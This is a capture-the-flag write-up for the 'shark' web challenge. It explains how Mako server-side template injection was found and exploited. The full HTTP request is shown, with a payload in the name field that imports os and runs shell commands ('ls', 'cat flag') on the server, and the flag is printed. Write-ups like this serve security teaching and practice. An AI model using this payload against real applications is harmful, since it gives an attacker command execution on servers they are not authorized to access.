Challenge Description

Exploit the shark and get the flag!

Flag Proof

CTF{4b08602e0090f81707b98ca687a5cacfd32888ffceef1d3cff2d99e6034b1e58}

Summary

Mako template injection

Details

On the website given we have an input field, a button, and a hello message. Submitting any value will change the hello message to Hello <message>!.

Let’s see the headers of the response:

➜  ~ curl -I 34.107.115.255:30530                            
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 213
Server: Werkzeug/2.0.3 Python/3.6.9
Date: Sat, 21 May 2022 21:13:26 GMT

We see that it’s a Python server, which means it could be vulnerable to SSTI. The title of the challenge mentions a shark, so the template engine must be Mako.

As such, we send the following payload (using BurpSuite):

POST / HTTP/1.1
Host: 34.107.115.255:32539
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Origin: <http://34.107.115.255:32539>
Connection: close
Referer: <http://34.107.115.255:32539/>
Upgrade-Insecure-Requests: 1

name=<%
import os
x=os.popen('cat flag').read() # initially 'ls' to see the files in the directory
%>
${x}

This gives out the flag, and we’ve completed the challenge.

CTF{4b08602e0090f81707b98ca687a5cacfd32888ffceef1d3cff2d99e6034b1e58}